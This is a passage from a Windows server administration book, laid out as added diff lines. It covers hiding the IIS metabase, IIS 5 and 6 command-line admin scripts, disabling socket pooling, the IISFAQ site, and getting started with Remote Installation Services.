+change your IIS configuration, and you, as administrator, require
+these permissions to access the metabase later, if necessary.
+
+Rename the metabase.bin file to something different and give it a
+unique file extensionsomething like ab345mn7.pqr, for example.
+Now, open Registry Editor (Start Run regedit) and find
+the HKLM\SOFTWARE\Microsoft\InetMgr\Parameters key. Add a new
+value to this key by right-clicking on Parameters and selecting
+New String Value. Type MetadataFile for the value name and
+leave the data type as REG_SZ. Double-click on the value and
+change the value data to the full path to where ab345mn7.pqr (or
+whatever you've called it) is located, as shown in Figure 6-7. Be
+sure to include the drive letter in your path.
+Figure 6-7. Hiding the name and location of the
+metabase
+
+Now, start the IIS services by typing iisreset /start at the
+command line. Open Internet Services Manager and verify that
+you can modify the configuration and save changes successfully.
+You're metabase is now hidden from attackers, making your web
+server more secure.
+Open Windows Explorer and find your
+%SystemRoot%\System32\inetsrv folder again. Surprise! There's
+a file named metabase.bin in this directory again. For some
+reason, when you delete or move this file and restart IIS
+services, Windows automatically creates a new metabase.bin file
+in the inetsrv directory. But if you click on this file, you'll see
+that it's only 610 bytes in size; it's not a working metabase. In
+fact, go ahead and delete this fileyou don't have to stop the IIS
+Admin Services to do soand it shouldn't appear again, even if
+you restart IIS again.
+The metabase is hidden now, but what about backups of the
+metabase? [Hack #54] showed how to back up the metabase in
+order to prevent making configuration errors on your IIS
+machine. If you've saved the configuration of your IIS machine,
+copies of your metabase can be found in
+%SystemRoot%\System32\inetsrv\MetaBack. Unfortunately,
+there's no way to change the location where metabase backups
+are stored, so the best thing to do might be to copy these
+backups to a network share and then delete them from the web
+server itself. That way, there's only one copy of the metabase on
+your server, one that's hidden and has a different name than
+metabase.bin.
+What about IIS 6? Unfortunately, on Windows Server 2003,
+creating a
+HKLM\SOFTWARE\Microsoft\InetMgr\Parameters\MetadataFile Registry
+key has no effect, so this method doesn't work. But IIS 6 is
+inherently more secure than IIS 5 for a number of reasons.
+Because you can encrypt metabase backups to prevent them
+
+from being misused, it's probably not that important that you
+can't hide the metabase on that platform.
+
+Hack 59 IIS Administration Scripts
+Here are some handy scripts that can be used to administer IIS
+from the command line.
+Microsoft does a pretty good job of developing GUI tools for
+managing most aspects of Windows, but until only a few years
+ago they were weak on the scripting side. With the advent of
+Visual Basic Scripting Edition (VBScript) and the Windows
+Scripting Host (WSH), administering Windows from the command
+line became a reality. Incorporating Active Directory Services
+Interface (ADSI) into Windows 2000 and adding a Windows
+Management Instrumentation (WMI) provider for IIS into
+Windows Server 2003 has taken Windows scripting even further,
+and now you can manage just about any aspect of IIS in
+particular and Windows servers in general remotely from the
+command line.
+Of course, someone still has to write the scripts.
+Unfortunately, most administrators who work in the real world of
+supporting businesses' computing infrastructures have little
+time for the luxury of learning VBScript and WMI. Learning to
+write your own scripts to administer Windows is a time-
+consuming affair, and if you're responsible for managing users,
+keeping servers running, maintaining security, and preparing for
+disasters, then time is something that's usually in limited
+supply.
+Fortunately, Microsoft has done some of the work for you by
+
+developing some handy scripts that can be used to simplify or
+automate IIS administration. This is especially true of IIS 6
+(Windows Server 2003), but there's also some useful stuff you
+can use for IIS 5 (Windows 2000).
+IIS 5 Scripts
+Windows scripting was still in its infancy when IIS 5 was
+released, but Microsoft decided to include a few basic scripts
+with it (along with other sample content) to illustrate the power
+of what IIS could do. Four pairs of sample scripts are found in
+C:\Inetpub\iissamples\sdk\admin; one script in each pair is
+written in VBScript and the other is written in JScript, a
+Javascript (ECMAScript) derivative that's fallen out of favor
+lately for writing Windows administration scripts. Although these
+scripts are mainly intended for learning purposes, a couple of
+them are useful, so I'll briefly summarize what they can do (I'll
+focus here on the VBScript versions only).
+Metabase backups and restores can be performed from the
+command line by using metaback.vbs and metabackrest.vbs.
+These sample scripts require that you use Cscript.exe, the
+command-line version of WSH, to run them. For example, if you
+want to back up the metabase using 14 Nov 03 Backup as the
+name of the backup, just open a command prompt and type the
+following command:
+cscript C:\Inetpub\iissamples\sdk\admin\metaback.vbs "14 Nov 03 Backup"
+A metabase backup with that name will be created in the
+%SystemRoot%\system32\inetsrv\MetaBack folder with the
+filename 14 Nov 03 Backup.MD0. You can even create multiple
+backups with the same name but different version numbers using
+the -v switch, like so:
+
+cscript C:\Inetpub\iissamples\sdk\admin\metaback.vbs "14 Nov 03 Backup" -v 15
+This command creates the backup file 14 Nov 03 Backup.MD15.
+Versioning is a good way to keep track of minor configuration
+changes made while tweaking the metabase to improve IIS
+performance. And running the script repeatedly with the same
+backup name but without a -v switch will increment the version
+number of the backup file each time. Of course, like any script,
+you can also schedule its execution by using the Scheduled
+Tasks Wizard so that your metabase backups can take place on
+a regular basis during off hours.
+Another script included in iissamples is mkwebsrv.vbs, which
+lets you create a new web site from the command-line. Here's an
+example of how it works:
+cscript C:\Inetpub\iissamples\sdk\admin\mkwebsrv.vbs C:\data -c "New Site"
+-p 80
+This command creates a new web site named New Site, listening
+on port 80 and having C:\data for its home directory. This script
+is flaky, though, and can create only one new site before errors
+happen, so I don't advise using it (there's a much better
+replacement, which we'll discuss in a moment).
+The last script is logenum.vbs, which can be used to enumerate
+the different logging modules installed on IIS. This is basically
+just a sample script to show how ADSI and VBScript can be
+used to administer IIS. Because it's not very useful, I won't say
+more about it.
+And that's all the scripts in C:\Inetpub\iissamples\sdk\admin.
+AdminScripts
+
+Hidden away in another folder, C:\Inetpub\AdminScripts, there are
+many more scripts you can play with. And I do mean hidden;
+there's absolutely nothing mentioned in Windows 2000 Help
+concerning these scripts, and there's almost nothing mentioned
+on Microsoft's web site. You have to dig around in the Knowledge
+Base at Microsoft Product Support Services
+(http://support.microsoft.com) to find any information
+concerning these scripts. That shows the level of commitment
+Microsoft had to scripting, even as late as Windows 2000,
+doesn't it?
+Anyway, let's see what these scripts can do. Most of them are
+quite short and simple. First, the findweb.vbs script is a useful
+little utility that can display information about a web site you
+specify. Here's an example of how it works:
+cscript C:\Inetpub\AdminScripts\findweb.vbs -w "New Site"
+Typing this command on my machine displays the IP address,
+port number, and even the site ID of a web site named New Site.
+Once you know the ID of a site [Hack #56], you can stop, start,
+pause, or continue that particular web site by using the
+stopweb.vbs, startweb.vbs, pauseweb.vbs, and contweb.vbs
+scripts. For example, the following command stops the web site
+that has a site ID of 10in other words, New Site:
+cscript C:\Inetpub\AdminScripts\stopweb.vbs -a 10
+There are also similar scripts, such as stopftp.vbs, which can be
+used to control the status of individual FTP sites. And
+stopsrv.vbs can be used to stop both web and FTP sites in one
+operation. For example:
+cscript C:\Inetpub\AdminScripts\stopsrv.vbs -a w3svc/1 msftpsvc/1
+This command stops both the Default Web Site and Default FTP
+Site, while leaving both the WWW Publishing Service and FTP
+
+Service running. Of course, if you prefer, you can stop these
+services entirely by using net stop w3svc or net stop msftpsvc.
+Then there's mkw3site.vbs, which is used to create new web
+sites. This definitely has more functionality than the sample
+mkwebsrv.vbs script found in the \iissamples\sdk\admin folder,
+and it has options for specifying the site's home directory,
+friendly name, port number, IP address, host header name, and
+even the site ID if you desire. For example, the following
+command creates a web site named My Site with a site ID of 101,
+a home directory of C:\home, and an IP address of
+212.44.64.24:
+cscript C:\Inetpub\AdminScripts\mkw3site.vbs -r C:\home -t "My Site" -i 212.44.64.24 -n
+101
+A similar script, mkwebdir.vbs, can be used to create virtual
+directories within a web site and has similar syntax.
+Chaccess.vbs is an interesting script that lets you modify the
+web permissions of a site programmatically. For example, the
+following command sets the web permissions for New Site (site
+ID 10) to allow Read and Script permissions but deny Write,
+Execute, and Directory Browsing:
+cscript C:\Inetpub\AdminScripts\chaccess.vbs -a w3svc\10\ROOT +read -write +script
+-execute -browse
+Another interesting script is dispnode.vbs, which can display a
+host of information about any node in the metabase you specify.
+For example:
+cscript C:\Inetpub\AdminScripts\dispnode.vbs -a IIS://localhost/w3svc
+This command lists the web permissions, default document,
+
+anonymous user account, maximum number of connections,
+connection timeout, whether logging is enabled, and schema
+information about the metabase node.
+Finally, there's adsutil.vbs, the mother of all IIS scripts. This
+script leverages the Active Directory Services Interface (ADSI)
+to programmatically manipulate many different aspects of IIS.
+The power of this little gem is best seen by some examples. You
+can modify web permissions using a command like this:
+cscript C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/1/root /accesssource "true"
+This command allows Script Source Access on your home
+directory. The same can be done with other permissions, such as
+Read, Execute, and so on.
+The adsutil.vbs script can also be handy if you have to restore
+the metabase from backup after reinstalling IIS (this works only
+after reinstalling IIS components, not after reinstalling your
+operating system). If you reinstall IIS and then use Internet
+Services Manager to restore a metabase backup, you'll receive
+an error message saying the restore failed. You can simply
+ignore the error message and type the following command from a
+command prompt:
+cscript.exe C:\InetPub\AdminScripts\adsutil.vbs enum w3svc
+This retrieves the password for the IWAM_computername account
+used by IIS (the enum option displays pretty much the whole
+contents of the metabase, which you have to wade through
+manually or pipe to grep if you have grep installed). Then, open
+the properties of the IWAM_computername account in Local Users
+and Groups in Computer Management and type the password
+you retrieved for it earlier. Finally, restore the same metabase
+backup again in Internet Services Manager and the metabase
+should be restored.
+
+You can do many other neat things using adsutil.vbs, such as
+disabling socket pooling [Hack #60], enabling reverse DNS
+lookups, enumerating server bindings, configuring IIS to support
+both NTLM and Kerberos authentication, and modifying just
+about anything in the metabase you want to play with. For more
+information on adsutil.vbs, you can find a pile of Knowledge Base
+articles at the Microsoft Product Support Services web site
+(http://support.microsoft.com). You should know, though, that
+with the advent of IIS 6 on Windows Server 2003, ADSI is now
+considered on the way out and Windows Management
+instrumentation (WMI) is all the rage. But that's a story for a
+different book.
+IIS 6 Scripts
+Scripted administration of IIS has really matured on the IIS 6
+platform with nine well-designed scripts written in VBScript to
+play with (no IIS 6 scripts were written in JScript). These scripts
+are much more functional and less likely to break than the
+sample scripts included with IIS 5. They are found in the
+%Systemroot%\system32 directory, which is part of the system
+path and thus makes using them more convenient. Also, instead
+of using ADSI, these scripts make use of WMI, a more powerful
+programmatic approach that can do almost anything on both
+local and remote servers.
+In the following discussion, I'll leave out
+the cscript portion of each script
+command, because by registering CScript
+instead of WScript (the GUI version of
+CScript) as your default host for VBScript,
+
+you can omit typing cscript at the
+beginning of each script command.
+To register Cscript as your default host,
+either type cscript //H:cscript at a
+command prompt or simply try to run one
+of these scripts. You'll be presented with a
+dialog box that says "Would you like to
+register CScript as your default host for
+VBScript?" Click OK. Once you've done
+this, you don't need to type cscript at the
+beginning of a script command and you
+don't need to include the file extension of
+your script in the command. This definitely
+makes things more convenient.
+Creating and managing web sites
+First, you can create and manage web sites easily using the
+iisweb.vbs script. The syntax here is similar to mkw3site.vbs in
+IIS 5, but it's easier to use because it needs fewer switches to
+specify options. For example, to create a web site named Sales
+Web with an IP address of 205.16.45.12 and a home directory of
+C:\Sales, all you have to do is type the following command:
+iisweb /create C:\Sales "Sales Web" /i 205.16.45.12
+
+Other options for the /create switch let you specify a port
+number, host header name, and whether the web site should be
+started or stopped once it's created. The command displays
+output that verifies each setting it configures, including the
+randomly generated site ID number used by IIS 6 to uniquely
+identify each web site internally. One limitation of creating web
+sites with this script is that the home directory must be
+specified as an absolute path and located on the local IIS
+machine. This means that if you want to use a network share on
+another server as a home directory for your site, you'll have to
+open the site using Internet Services Manager and specify a
+UNC path to the remote home directory.
+What else can you do with iisweb.vbs? Well, you can use the
+/delete switch to delete any web site on your server, including
+those you created using the Web Site Creation Wizard started
+from Internet Services Manager. Using the /stop, /pause, and
+/start switches, you can stop, pause, and restart an individual
+web site (whether it was created with iisweb.vbs or Internet
+Services Manager) independently of all other sites hosted on the
+server. You can even stop, pause, or start multiple sites
+simultaneously by including their names in a single command.
+Of course, if you want to stop, pause, or start all web sites on
+your server, using the iisreset command is easier. Finally, the
+/query switch lets you display a summary of information
+concerning all web sites running on your machine. By redirecting
+this summary to a text file, you can quickly document the sites
+on your server.
+Once you've created a new web site, you can add new virtual
+directories to it by using the iisvdir.vbs script. Again, this script
+can be used to create only local virtual directories (mapped to a
+physical folder on the IIS machine), not remote virtual
+directories (mapped to a network share); you can get around this
+limitation only by using the GUI. But you can also use the
+
+/delete switch to delete virtual directories and the /query switch
+to display all virtual directories within a given web site, including
+nested virtual directories. The syntax is easy to remember:
+iisvdir /create "Sales Web" reps C:\SalesPersons
+This command creates a virtual directory named reps within the
+web site named Sales Web and maps this virtual directory to the
+C:\SalesPersons folder on the machine's hard drive.
+And guess what? Everything you can do with web sites can also
+be done with FTP sites by using the iisftp.vbs and iisftpdr.vbs
+scripts included with IIS 6.
+Managing the metabase
+What about managing the metabase? In [Hack #54], we learned
+the importance of regular metabase backups, and earlier in this
+hack we saw how the metaback.vbs and metabackrest.vbs sample
+scripts included with IIS 5 provide basic backup and restore
+functionality. Such functionality is greatly increased in IIS 6
+with two new scripts: iiscnfg.vbs and iisback.vbs.
+Backing up and restoring the metabase is done by using the
+/backup and /restore switches of iisback.vbs. These switches
+include the option of encrypting your backups with a password to
+make them more secure. For example, the following command
+creates a backup of Metabase.xml and MBSchema.xml in the
+MetaBack folder and encrypts the backup with the complex
+password pa$$w0rD:
+iisback /backup /b "14 Nov 03" /e pa$$w0rD
+
+One nice added feature that the earlier metaback.vbs script of
+IIS 5 lacks is the ability to list all backups from the command
+line and delete any that are no longer necessary by using the
+/list and /delete switches, respectively. You can also use the
+/restore switch to restore the metabase from either a backup file
+or history file, depending on your needs.
+The other script, iiscnfg.vbs, is a powerful tool for exporting and
+importing IIS configuration information. The simplest use of this
+script is iiscnfg /save, which flushes the current in-memory
+metabase to disk. This is usually done automatically by IIS
+shortly after configuration changes are made, but if you're
+experimenting with configuration changes, you can use this to
+force IIS to save the metabase immediately and create a new
+history file as well. Metabase exports take all or a portion of
+MetaBase.xml and save it as an XML file in the directory you
+specify. For example, the following command takes everything in
+the metabase about the web site with site ID 1 (usually the
+Default Web Site) and exports it to the site1.xml file in the
+C:\stuff folder:
+iiscnfg /export /f C:\stuff\site1.xml /sp /LM/W3SVC/1 /inherited
+/recursively
+Here, the /inherited option ensures that any metabase
+properties inherited at the /LM/W3SVC/1 level from higher levels,
+such as /LM or /LM/W3SVC, are explicitly written to the export file
+(since the target import server might not have these properties
+specified) and the /children option indicates that metabase
+subkeys should be recursively included in the export file. This is
+a great feature, because you can use it to export the exact
+configuration of a web site and then import the configuration
+(using iiscnfg /import) into another IIS machine to clone a copy
+of the web site (you still have to copy the site content, though).
+
+You can even clone the entire configuration of your IIS server by
+using iiscnfg.vbs to export the root metabase key (/). There's a
+caveat, though: exported files of metabase properties that are
+encrypted can't be imported to other machines. Also, you can't
+export the metabase schema file (MBSchema.xml) by using
+iiscnfg /export, so if you've made any modifications to the
+schema, this approach won't work. But most administrators
+never try to modify the schema anyway, because it's too risky
+and complicated, so the second limitation isn't really a problem.
+You can work around the first limitation (encrypted metabase
+properties); all you need to do is remove or modify any machine-
+specific settings from the export file before importing it into
+another IIS server. That means deleting keys that refer to IUSR
+or IWAM, special built-in accounts used by IIS for
+authentication purposes; deleting AdminACL settings in the top
+level (.) of the metabase; deleting keys that specify passwords
+for remote virtual directories or any other purposes; and
+modifying any keys that specify paths to content directories not
+mirrored on the target server. Once you've hacked away and
+made the necessary changes to your export file, you can import
+it to another machine and gain an exact clone of your original
+machine's configuration.
+There are also other ways to clone configurations. The iiscnfg
+/copy command overcomes the limitation of exports by copying
+both the metabase configuration and the schema files to a
+remote machine. The command calls the iisback.vbs script and
+removes all machine-specific settings from the metabase, with
+the exception of content paths. So, if your target machine has a
+content file structure that is identical to your original machine,
+you can use iiscnfg /copy to clone IIS in one easy stop.
+Why not use iiscnfg /copy all the time instead of using iiscnfg
+/export /sp /? Though using /export is more complex, it also
+provides you with greater flexibility. It allows you to make any
+
+custom modifications you want to the metabase before you
+import your configuration to a new machine. For example, the
+/export switch also includes a /merge option that lets you merge
+virtual directories to consolidate and simplify a site. You can
+also use this option to merge good metabase settings over
+corrupt ones to recover a working metabase after something
+goes wrong. Anyway, that's just another of those tradeoffs that
+are common in administering servers: the method that requires
+more work is more flexible than the rigid, simple approach.
+Choose the right tool to meet your needs.
+Managing web applications
+Finally, IIS includes two scripts to manage web applications
+(iisapp.vbs) and web service extensions (iisext.vbs). The simple
+Iisapp.vbs script lists all web applications running on the server,
+displays their process identity (PID), and indicates the
+application pool to which they're assigned.
+The Iisext.vbs script is more powerful and lets you display all
+web service extensions running on the server, show the actual
+executables of these extensions, add new extensions, and
+enable or disable extensions. For example, iisext /listapp
+displays Active Server Pages, Server-Side Includes, WebDAV,
+and any other extensions running on your server; iisext /listext
+does this in shorter form by displaying ASP, SSINC, and
+WEBDAV; and iisext /listfile displays the DLLs associated
+with these extensions, such as asp.dll, ssinc.dll, and httpext.dll.
+Application pools and web service extensions are new features
+of IIS 6; for more information on them, see IIS 6 Administration
+(Osborne/McGraw-Hill).
+
+Running scripts remotely
+Finally, another powerful feature of IIS 6 administration scripts
+is the ability to run them remotely from a Windows XP
+workstation or another Windows Server 2003 machine (you can't
+run them from Windows 2000 because that platform lacks a WMI
+provider for IIS). All of these scripts support the /u and /p
+options (to specify credentials that work on the remote machine)
+and the /s option (to specify the DNS name or IP address of the
+remote machine).
+To create a web site named Products with a home directory of
+C:\stuff, IP address 202.44.33.11, and port number 80 on the
+remote IIS machine named WEBSRV99, type the following
+command at a command prompt on your XP workstation:
+iisweb /create C:\stuff Products /b 80 /i 202.44.33.11 /s websrv99.mtit.com /u WEBSRV99\
+Administrator /p pa$$w0rD
+Alternatively, telnet into the remote machine (if the Telnet
+Server services has been enabled on it) and leave out the /s
+websrv99.mtit.com portion of the command. Or, to run the
+command locally on the remote server, open a Remote Desktop
+Connection to the remote machine (if Remote Desktop has been
+enabled on it) and again leave out /s websrv99.mtit.com.
+Which method is best? Unfortunately, using the /s option sends
+the credentials over the network in unencrypted form, and Telnet
+does the same. So, your safest bet is to enable Remote Desktop
+and use it for remotely managing IIS machines in your server
+room from your administrator workstation in your office.
+
+Custom Scripts
+If you have a working knowledge of VBScript, ADSI and WMI,
+you can easily write your own IIS administration scripts to
+accomplish various tasks. Here are two short but useful scripts
+to back up and restore the metabase on a remote IIS 5 machine.
+First, here's the backup script:
+Dim IISComputer
+Dim Flags
+Dim TargetComputer
+TargetComputer = "IISComputerName"
+Flags = (MD_BACKUP_SAVE_FIRST Or MD_BACKUP_FORCE_BACKUP)
+Set IISComputer = GetObject("IIS://" & TargetComputer)
+IISComputer.Backup "MyBackupFile", MD_BACKUP_NEXT_VERSION, Flags
+To use this script, simply replace the variables IISComputerName
+and MyBackupFile with the name of your web server and the full
+path to the backup file you create. Then, copy and paste the
+script into Notepad (make sure to have Word Wrap disabled) and
+save it with a .vbs extension. Make sure you have the latest
+scripting engines on the workstation from which you run this
+script. You can download the latest scripting engines from the
+Windows Script home page at MSDN
+(http://msdn.microsoft.com/library/default.asp?
+url=/nhp/Default.asp?contentid=28001169).
+Here's a similar script for restoring the IIS 5 metabase to a
+
+remote machine:
+Dim IISComputer
+Dim TargetComputer
+Dim BackupLocation
+TargetComputer = "IISComputerName"
+BackupLocation = "PathToBackup"
+Set IISComputer = GetObject("IIS://" & TargetComputer)
+IISComputer.Restore BackupLocation, MD_BACKUP_HIGHEST_VERSION, 0
+Where to Find More Scripts
+If you're into rolling your own WMI scripts, then more power to
+you; you have more time on your hands than I do. Busy geeks
+like me prefer to create our toolkit by collecting prefab stuff from
+various sources. Here are some places where you can find
+additional scripts for administering IIS.
+The IIS Resource Kit (Microsoft Press) was written for IIS 4
+(Windows NT) and is a bit out of date. But it still provides a
+useful introduction to the subject for newbies to Windows
+scripting. I still use this book from time to time, since IIS 5 is
+not that much different from IIS 4, but don't use it if you plan to
+work only with IIS 6, because of the architectural changes and
+enhancements on that new platform. The CD-ROM included with
+this book includes a number of useful scripts.
+The IIS 5 Resource Guide, which is part of the Windows Server
+
+2003 Resource Kit from Microsoft Press, also has some
+information on ADSI scripting, but it's pretty minimal. Most of
+the book focuses on deployment issues and performance tuning.
+Chris Crowe's popular IISFAQ web site [Hack #61] has a pile of
+useful scripts, many of them written by Chris himself. If you are
+an administrator who works with IIS, you'd do well to spend a few
+hours becoming familiar with all the resources on this site.
+Finally, there's the Windows Script Development Center at MSDN
+(http://msdn.microsoft.com/scripting/), which has a ton of
+information on how to get started writing your own WMI scripts, if
+you have the time and patience to do so.
+Rod Trent and Mitch Tulloch
+
+Hack 60 Run Other Web Servers
+Here's how to run another web server, in addition to IIS, on the
+same machine without conflict over who gets port 80.
+Ever have problems when you try to run more than web server on
+the same machine? Or have you run some other web-enabled
+software together with IIS, only to find that one or both of them
+break? The problem here is socket pooling, a feature of IIS 5 and
+later that causes IIS to bind to all IP addresses configured on
+the server, even on a multihomed machine with more than one
+network card. The funny thing is that socket pooling even binds
+IIS to IP addresses that aren't yet assigned to any web site on
+the machineeven if there's no Default Web Site configured to
+respond to All Unassigned IP addresses by default. This
+behavior not only prevents other HTTP software from coexisting
+with IIS, but it can also cause IIS to return errors to clients. A
+workaround that sometimes works is to set the HTTP port
+number for the other software to something nonstandard, such
+as 8099, but that won't work in most cases unless clients using
+that software also use that port to connect. By default, however,
+IIS won't let any other application listen on port 80 (the
+standard HTTP port), even if it's listening on an IP address that
+is not used by IIS.
+Disabling Socket Pooling in IIS 5
+
+Socket pooling is enabled on IIS 5, by default, but it can be
+disabled to allow other HTTP-enabled third-party software to run
+side-by-side with IIS, each responding to requests sent to
+different IP addresses. There are two ways to do disable socket
+pooling in IIS 5. First, you can edit the metabase by using the
+MetaEdit utility [Hack #54]. By default, the setting for socket
+pooling is defined in the metabase schema, but you can use
+MetaEdit to create a new metabase key called
+DisableSocketPooling in the location /LM/W3SVC and assign it the
+value of true (1). In other words, the default value for
+DisableSocketPooling in the schema is false (0), which means it is
+false to say socket pooling is enabled. Don't you love those
+double negatives?
+The other way to disable socket pooling is to use the adsutil.vbs
+script included in C:\Inetpub\adminscripts [Hack #59]. Type the
+following command:
+cscript C:\Inetpub\adminscripts\adsutil.vbs set w3svc/disablesocketpooling true
+You should see the response DisableSocketPooling: (BOOLEAN)
+True. Now, stop IIS services by typing net stop iisadmin /y
+(which also stops the dependent WWW Publishing Services).
+Then, restart them by typing net start w3svc (which also starts
+the parent IIS Admin Service). Socket pooling is now disabled.
+If you like, you can use MetaEdit to verify that the key has been
+added.
+Disabling Socket Pooling in IIS 6
+The DisableSocketPooling metabase key is also valid in IIS 6 but,
+interestingly enough, changing it from 0 to 1 doesn't do anything.
+That's because socket-pooling functionality has been moved
+
+from the Winsock HTTP listener used in IIS 5 to the new kernel
+mode HTTP driver (http.sys). As a result, you have to use a nifty
+little utility called Httpcfg.exe to disable it.
+This utility is found in the /Support/Tools folder on your Windows
+Server 2003 product CD, so begin by inserting this CD and
+double-clicking on /Support/Tools/SUPTOOLS.MSI to install these
+tools on your server. Next, open a command prompt and type
+httpcfg set iplisten -i w.x.y.z:n to add IP address w.x.y.z and
+port number n to the IP inclusion list for http.sys. This inclusion
+list specifies which IP addresses http.sys listens on and is
+initially empty by default, which means that IIS listens to all IP
+addresses (not none, as you might suspect). However, once you
+add an IP address and port number (i.e., a socket) to the
+inclusion list, http.sys will now listen only on the specified
+socket and ignore all others, leaving them available for other
+applications to listen on. You can add as many sockets to the
+inclusion list as you choose, and you can display a list of
+listening sockets at any time by typing httpcfg query iplisten at
+a command prompt.
+Don't forget to restart IIS after modifying the list, because
+http.sys reads this list only on startup. You don't have to restart
+all IIS services, only the HTTP Service (a subcomponent of the
+WWW Publishing Services and a service not displayed in the
+Services console). To restart the HTTP Service, type net stop
+http /y to stop it and net start w3svc to start it. Note that if you
+have problems afterwards starting any web sites on your IIS
+machine, you probably forgot to add their IP addresses to the
+inclusion list.
+Other Reasons to Disable Socket Pooling
+
+If running third-party HTTP software together with IIS isn't your
+cup of tea, there are other reasons why you might want to
+disable socket pooling. The bandwidth-throttling feature of IIS
+that is configured through Internet Services Manager throttles
+bandwidth to all web sites running on IIS equally. The same is
+true of the performance-tuning settings configured through the
+GUI. If you prefer to configure these settings on a per-site
+basis, you have to disable socket pooling before it will work. This
+is not obvious from the GUI, which presents separate throttling
+and performance options for each site. The fact that these
+features don't work as advertised has been an open secret
+among the IIS community for a long time. They work only when
+socket pooling is disabled, and it's enabled by default.
+
+Hack 61 IISFAQ
+Here's a brief overview of IISFAQ, Chris Crowe's valuable web
+site that every IIS administrator should know about.
+I started the IISFAQ web site (http://www.IISFAQ.com) in early
+2000 initially as a resource to help me maintain a set of
+answers to frequently asked questions on the Microsoft IIS
+newsgroupsspecifically, the microsoft.public.inetserver.iis
+newsgroup on msnews.microsoft.com. The web site has grown up
+quickly over the years and is now regarded as one of the major
+sources of information regarding Internet Information Server on
+the Web. The web site is not affiliated with Microsoft in any way,
+but I do have limited access to the Microsoft IIS team though
+my Microsoft MVP status, which gives me access to some of the
+best information out there.
+On the site you will find more than 50 categories related to IIS,
+such as:
+Administration
+Configuration
+Installation
+
+Logging
+Security
+Troubleshooting
+There is also a growing repository of articles and links to
+content around the Web that we think you will find helpful in your
+search for information on IIS. We try to break down complex
+problems into helpful, easy-to-read articles that get to the point.
+Most of the articles include plenty of screen snapshots to help
+you follow along easily.
+The site is kept up-to-date with all the new information that is
+released regarding IIS on almost a daily basis. The site also
+specializes in scripts for the management of your web server.
+There are dozens of scripts written mainly in VBScript, but with
+the introduction of the .NET Framework we will see more written
+in C# in the future.
+The web site is also the official home to a debugging tool called
+IISState, which you can use to help diagnose problemsfor
+example, when your web server hangs or causes 100% CPU
+usage.
+There are also discussion forums on the site for those who wish
+to discuss their issues or to give feedback to others who are
+having problems.
+My Favorites
+
+Here are a few of my personal favorite articles on the site:
+Backup & Restore of the IIS Metabase: What tools can I
+use? (http://www.iisfaq.com/default.aspx?
+View=A329&P=73)
+How to Configure ODBC Logging toLlog to a Microsoft
+Access Database (http://www.iisfaq.com/default.aspx?
+View=A151&P=141)
+Troubleshooting ASP and Microsoft Access Databases
+(http://www.iisfaq.com/default.aspx?
+View=A396&P=160)
+And here are some of my personal favorite scripts on the site:
+A VB script that will archive all the log files for all of the
+IIS services that are over a specified age, in days
+(http://www.iisfaq.com/default.aspx?
+View=A141&P=109). This script uses the Microsoft
+MAKECAB.EXE command to make a *.cab file. After the CAB
+file is created, the original log file is deleted if the
+creation of the CAB file was successful. The CAB file will
+have the same name as the original log file. You save
+around 90-95% of disk space.
+A VB script that uses WMI to allow you to create DNS
+entries on your DNS Server
+(http://www.iisfaq.com/default.aspx?
+
+View=A319&P=109).
+A script that enumerates all web sites using C#
+(http://www.iisfaq.com/default.aspx?
+View=A540&P=199).
+I hope you find IISFAQ a useful resource as you work with IIS.
+Thanks!
+Chris Crowe
+
+Chapter 7. Deployment
+Hacks #62-68
+Section 62. Get Started with RIS
+Section 63. Customize RIS
+Section 64. Tune RIS
+Section 65. Customize SysPrep
+Section 66. Remove Windows Components from the
+Command Line
+Section 67. Unattended Installation of Windows
+Components
+Section 68. Easily Create a Network Boot Disk
+
+Hacks #62-68
+Administering Windows-based networks begins with deployment,
+and the focus of this chapter is on how to manage the
+installation (and uninstallation) of Windows 2000/XP/2003 and
+its individual components. In particular, the first several hacks
+deal with Remote Installation Services (RIS) and Sysprep, two
+powerful but complex tools for installing Windows images on
+large numbers of machines. Other hacks deal with removing
+unnecessary components manually from the command line,
+removing components during unattended setup, and creating a
+network boot disk for unattended installation of Windows. These
+tips and tools are designed to make the job of deploying
+Windows easier so that you can get on with the day-to-day job of
+configuring, maintaining, and troubleshooting systems on your
+network.
+
+Hack 62 Get Started with RIS
+Remote Installation Services (RIS) is a complex but powerful
+tool for deploying Windows images. Here's a guide to getting
+started with it.
+In the past, with the many flavors of Windows, there were many
+ways of configuring and deploying Windows to client machines.
+Such automated and customized methods included imaging with
+a tool such as GHOST or scripting with answer files and
+VBScript or other automation tools to deploy silently and without
+user intervention. Or, you could make one image on a hard drive
+and use a hard-drive-cloning device to copy the image to
+multiple hard disks at once. The technology and methodologies
+for deploying a customized Windows operating system to client
+workstations has matured over the years, but not quite to the
+plug and play capability we would all like to see.
+As part of Microsoft's change and configuration-management
+initiative, they developed a service included with Windows 2000
+called Remote Installation Service (RIS). RIS supports
+deploying both automated and customized versions of Windows
+2000 and XP Professional to clients that support the
+PXE/DHCP-based remote technology for remotely installing the
+operating system on the client computer over the network. The
+intention that Microsoft was communicating to the corporate
+technologists when they were developing Windows 2000 was
+that you could basically plug a new computer into the network,
+start the computer, authenticate, and the operating system
+
+would be installed and configured for the user within a short
+matter of time.
+With a little bit of work, it actually does just that.
+Not only can you deploy images of Windows 2000 and XP
+through RIS, but with a tool developed by 3Com
+(http://www.3com.com/en_US/lanworks/index.html) you also can
+deploy BIOS updates, other applications, Windows 2000 Server
+images, and so on. RIS is customizable and flexible; you can
+modify the Client Installation Wizard to prompt users for
+information, pass information to setup answer files, and populate
+environment variables with information. You can deploy disk
+images with RIS, but I recommend the scripted, silent-
+installation approach, because it is more customizable. I
+successfully use RIS in my office to deploy a customized
+Windows XP Professional image, and it saves me a lot of time.
+Think of RIS as a network-based boot disk. The client
+workstation boots onto the network and obtains an IP address
+from a DHCP server and the location of the RIS server, RIS
+verifies the client is a known client, and then the Client
+Installation Wizard appears. It is similar to using a boot disk
+with NDIS drivers, a custom menu, and prompts via autoexec.bat
+or some other script called on the disk.
+Requirements for RIS
+So, what do you need to get started with RIS? First, you need a
+PXE-compliant (PXE stands for Pre-Boot Execution Environment)
+network card and system BIOS that supports setting the LAN as
+a bootup device. Most network cards todaysuch as ones from
+Intel, 3Com, SMC, and RealTeksupport PXE. For those
+workstations that are not compliant, you can create a bootable
+
+disk with a PXE emulator by using a tool that accompanies RIS.
+Next, you need a Windows 2000 server that is a member of an
+Active Directory-enabled domain. Active Directory is required,
+because it provides client authentication and configuration
+information for the RIS server and RIS also stores its
+configuration information within Active Directory. Obviously, you
+need TCP/IP, because it is the basic networking protocol
